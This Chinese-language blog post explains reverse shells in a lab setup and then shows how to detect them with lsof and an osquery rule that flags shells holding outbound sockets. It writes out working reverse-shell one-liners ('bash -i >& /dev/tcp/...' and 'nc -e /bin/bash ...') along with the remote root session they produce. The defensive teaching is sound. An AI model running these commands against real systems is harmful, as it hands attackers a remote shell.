反弹shell

2020-03-27

字数统计: 2.1k字 | 阅读时长≈ 11分

一、shell反弹方法

环境

受害服务器：172.16.93.202
主动攻击服务器：172.16.93.193

在主动攻击服务器上开启监听一个tcp 7777端口的服务

1 2	tmux nc -lvp 7777

在受害者机器上执行如下命令

1	bash -i >& /dev/tcp/172.16.93.193/7777 0>&1

主动攻击服务器上-显示效果如下：

#主动攻击服务器命令行前后变化
$ nc -lvp 7777
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::7777
Ncat: Listening on 0.0.0.0:7777
Ncat: Connection from 172.16.93.202.
Ncat: Connection from 172.16.93.202:60110.
---------------------------------------------------------------------
[root@make ~]# ip a    
eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group 
    link/ether 00:0c:29:25:bc:20 brd ff:ff:ff:ff:ff:ff
    inet 172.16.93.202/24 brd 172.16.93.255 scope global noprefixroute 
......
......
[root@make ~]# 
[root@make ~]#

如何理解下面的nc命令?

1	bash -i >& /dev/tcp/172.16.93.193/7777 0>&1

“bash -i” 代表在本地打开一个bash
“/dev/tcp/” 是Linux中的一个特殊设备,打开这个文件就相当于发出了一此socket调用，建立了一个socket连接
“>&” 后面跟上“/dev/tcp/ip/port”这个文件代表将标准输出和标准错误输出重定向到这个文件(Linux一切皆文件)“/dev/tcp/ip/port” 。如果远程开启了对应的端口去监听，就会接收到这个bash的标准输出和标准错误输出。这个时候对就可以对远程“受害” CentOS7进行操作。

二、nc反弹方法

在主动攻击服务器上开启监听一个tcp 7777端口的服务

1 2	tmux nc -lvp 7777

在受害者机器上执行如下命令

1 2	#修改为主动攻击服务器的IP和端口 nc -e /bin/bash 172.16.93.193 7777

这里的-e后面跟的参数表示：在创建连接后执行的程序，即在连接到远程后可以在远程执行一个本地shell(/bin/bash)，也就是反弹一个shell给远程。

主动攻击服务器上-显示效果如下：

# nc -lvp 7777
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::7777
Ncat: Listening on 0.0.0.0:7777      #开启监听

--------------------------------------------------------------------------
Ncat: Connection from 172.16.93.202.
Ncat: Connection from 172.16.93.202:60112.  #socket完成连接

whoami #远程执行命令
root

ifconfig #远程执行命令
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.16.93.202  netmask 255.255.255.0  broadcast 172.16.93.255
        inet6 fe80::b4eb:f8f2:27d1:941b  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:25:bc:20  txqueuelen 1000  (Ethernet)
        RX packets 15384888  bytes 2144995590 (1.9 GiB)
        RX errors 0  dropped 275  overruns 0  frame 0
        TX packets 27554  bytes 2219599 (2.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
......
......

三、反弹shell 思路总结

#通过lsof命令可以看到当前文件描述符打开情况
$ lsof -Pn |egrep "TCP|UDP"

sshd   10482   root   3u   IPv4   146525   0t0   TCP 172.16.93.202:22->172.16.93.253:53676 (ESTABLISHED)
nc   10785    root    3u   IPv4   155170   0t0   TCP 172.16.93.202:60112->172.16.93.193:7777 (ESTABLISHED)
bash   10786   root   3u    IPv4  155170   0t0   TCP 172.16.93.202:60112->172.16.93.193:7777 (ESTABLISHED)

综合上述分析，反弹Shell的识别思路：检查Bash进程是否打开了终端设备，是否有主动对外连接

四、防御

yum -y install yum-utils
curl -L https://pkg.osquery.io/rpm/GPG | sudo tee /etc/pki/rpm-gpg/RPM-GPG-KEY-osquery
yum-config-manager --add-repo https://pkg.osquery.io/rpm/osquery-s3-rpm.repo
yum-config-manager --enable osquery-s3-rpm
yum install osquery
cp /opt/osquery/share/osquery/osquery.example.conf /etc/osquery/osquery.conf

cat /etc/osquery/osquery.conf

[root@make osquery]# cat osquery.conf 
{

  "options": {
    "config_plugin": "filesystem",
    "logger_path": "/var/log/osquery",
    "database_path": "/etc/osquery/osquery.db",
    "logger_plugin": "filesystem"
  },

  //定时任务配置
  "schedule": {
    "system_info": {
      "query": "SELECT hostname, cpu_brand, physical_memory FROM system_info;",
      "interval": 3600
  },
  
  //反弹shell检测规则，最后排除内网IP段的请求
  "behavioral_reverse_shell": {
     "query": "SELECT DISTINCT(processes.pid), processes.parent, processes.name, processes.path, processes.cmdline, processes.cwd, processes.root, processes.uid, processes.gid, processes.start_time, process_open_sockets.remote_address, process_open_sockets.remote_port, (SELECT cmdline FROM processes AS parent_cmdline WHERE pid=processes.parent) AS parent_cmdline FROM processes JOIN process_open_sockets USING (pid) LEFT OUTER JOIN process_open_files ON processes.pid = process_open_files.pid WHERE (name='sh' OR name='bash') AND remote_address NOT IN ('0.0.0.0', '::', '') AND remote_address NOT LIKE '10.%';",
     "interval": 10,
     "description": "Find shell processes that have open sockets"
   }

  },



  // Decorators are normal queries that append data to every query.
  "decorators": {
    "load": [
      "SELECT uuid AS host_uuid FROM system_info;",
      "SELECT user AS username FROM logged_in_users ORDER BY time DESC LIMIT 1;"
    ]
  },

  // Add default osquery packs or install your own.
  //
  // There are several 'default' packs installed via
  // packages and/or Homebrew.
  //
  // Linux:        /opt/osquery/share/osquery/packs
  // OS X:         /var/osquery/packs
  // Homebrew:     /usr/local/share/osquery/packs
  // make install: {PREFIX}/share/osquery/packs
  //
  "packs": {
    // "osquery-monitoring": "/opt/osquery/share/osquery/packs/osquery-monitoring.conf",
    // "incident-response": "/opt/osquery/share/osquery/packs/incident-response.conf",
    // "it-compliance": "/opt/osquery/share/osquery/packs/it-compliance.conf",
    // "osx-attacks": "/var/osquery/packs/osx-attacks.conf",
    // "vuln-management": "/opt/osquery/share/osquery/packs/vuln-management.conf",
    // "hardware-monitoring": "/opt/osquery/share/osquery/packs/hardware-monitoring.conf",
    // "ossec-rootkit": "/opt/osquery/share/osquery/packs/ossec-rootkit.conf",
    // "windows-hardening": "C:\\Program Files\\osquery\\packs\\windows-hardening.conf",
    // "windows-attacks": "C:\\Program Files\\osquery\\packs\\windows-attacks.conf"
  },

  // Provides feature vectors for osquery to leverage in simple statistical 
  // analysis of results data. 
  //
  // Currently this configuration is only used by Windows in the Powershell
  // Events table, wherein character_frequencies is a list of doubles 
  // representing the aggregate occurrence of character values in Powershell 
  // Scripts. A default configuration is provided which was adapated from 
  // Lee Holmes cobbr project: 
  // https://gist.github.com/cobbr/acbe5cc7a186726d4e309070187beee6
  // 
  "feature_vectors": {
    "character_frequencies": [
      0.0,      0.0,      0.0,      0.0,       0.0,      0.0,      0.0,
      0.0,      0.0,      0.0,      0.0,       0.0,      0.0,      0.0,
      0.0,      0.0,      0.0,      0.0,       0.0,      0.0,      0.0,
      0.0,      0.0,      0.0,      0.0,       0.0,      0.0,      0.0,
      0.0,      0.0,      0.0,      0.0,       0.0,      0.00045,  0.01798,
      0.0,      0.03111,  0.00063,  0.00027,   0.0,      0.01336,  0.0133,
      0.00128,  0.0027,   0.00655,  0.01932,   0.01917,  0.00432,  0.0045,
      0.00316,  0.00245,  0.00133,  0.001029,  0.00114,  0.000869, 0.00067,
      0.000759, 0.00061,  0.00483,  0.0023,    0.00185,  0.01342,  0.00196,
      0.00035,  0.00092,  0.027875, 0.007465,  0.016265, 0.013995, 0.0490895,
      0.00848,  0.00771,  0.00737,  0.025615,  0.001725, 0.002265, 0.017875,
      0.016005, 0.02533,  0.025295, 0.014375,  0.00109,  0.02732,  0.02658,
      0.037355, 0.011575, 0.00451,  0.005865,  0.003255, 0.005965, 0.00077,
      0.00621,  0.00222,  0.0062,   0.0,       0.00538,  0.00122,  0.027875,
      0.007465, 0.016265, 0.013995, 0.0490895, 0.00848,  0.00771,  0.00737,
      0.025615, 0.001725, 0.002265, 0.017875,  0.016005, 0.02533,  0.025295,
      0.014375, 0.00109,  0.02732,  0.02658,   0.037355, 0.011575, 0.00451,
      0.005865, 0.003255, 0.005965, 0.00077,   0.00771,  0.002379, 0.00766,
      0.0,      0.0,      0.0,      0.0,       0.0,      0.0,      0.0,
      0.0,      0.0,      0.0,      0.0,       0.0,      0.0,      0.0,
      0.0,      0.0,      0.0,      0.0,       0.0,      0.0,      0.0,
      0.0,      0.0,      0.0,      0.0,       0.0,      0.0,      0.0,
      0.0,      0.0,      0.0,      0.0,       0.0,      0.0,      0.0,
      0.0,      0.0,      0.0,      0.0,       0.0,      0.0,      0.0,
      0.0,      0.0,      0.0,      0.0,       0.0,      0.0,      0.0,
      0.0,      0.0,      0.0,      0.0,       0.0,      0.0,      0.0,
      0.0,      0.0,      0.0,      0.0,       0.0,      0.0,      0.0,
      0.0,      0.0,      0.0,      0.0,       0.0,      0.0,      0.0,
      0.0,      0.0,      0.0,      0.0,       0.0,      0.0,      0.0,
      0.0,      0.0,      0.0,      0.0,       0.0,      0.0,      0.0,
      0.0,      0.0,      0.0,      0.0,       0.0,      0.0,      0.0,
      0.0,      0.0,      0.0,      0.0,       0.0,      0.0,      0.0,
      0.0,      0.0,      0.0,      0.0,       0.0,      0.0,      0.0,
      0.0,      0.0,      0.0,      0.0,       0.0,      0.0,      0.0,
      0.0,      0.0,      0.0,      0.0,       0.0,      0.0,      0.0,
      0.0,      0.0,      0.0,      0.0,       0.0,      0.0,      0.0,
      0.0,      0.0,      0.0
    ]
  }    
}

#if osqueryd is started,than run cmd 'systemctl stop osqueryd'
osqueryctl config-check

systemctl enable osqueryd
systemctl start osqueryd
systemctl status osqueryd

日志路径：/var/log/osquery/osqueryd.results.log

1
2
3

 $ grep "behavioral_reverse_shell" /var/log/osquery/osqueryd.results.log |grep "added"
 
{"name":"behavioral_reverse_shell","hostIdentifier":"make","calendarTime":"Tue Feb 22 08:48:09 2022 UTC","unixTime":1645519689,"epoch":0,"counter":0,"numerics":false,"decorations":{"host_uuid":"5C5D4D56-672B-CCF8-F6DE-CEC52825BC20","username":"root"},"columns":{"cmdline":"bash -i","cwd":"/root","gid":"0","name":"bash","parent":"10487","parent_cmdline":"-bash","path":"/usr/bin/bash","pid":"14765","remote_address":"172.16.93.193","remote_port":"7777","root":"/","start_time":"1645519242","uid":"0"},"action":"added"}

日志内容可以通过监控并告警，告警后核查反弹shell, 确认后Kill 对应的Pid

本文作者： GaryWu
本文链接： https://garywu520.github.io/2020/03/27/反弹shell/
版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！

jsonContent: meta: false pages: false posts: title: true date: true path: true text: false raw: false content: false slug: false updated: false comments: false link: false permalink: false excerpt: false categories: false tags: true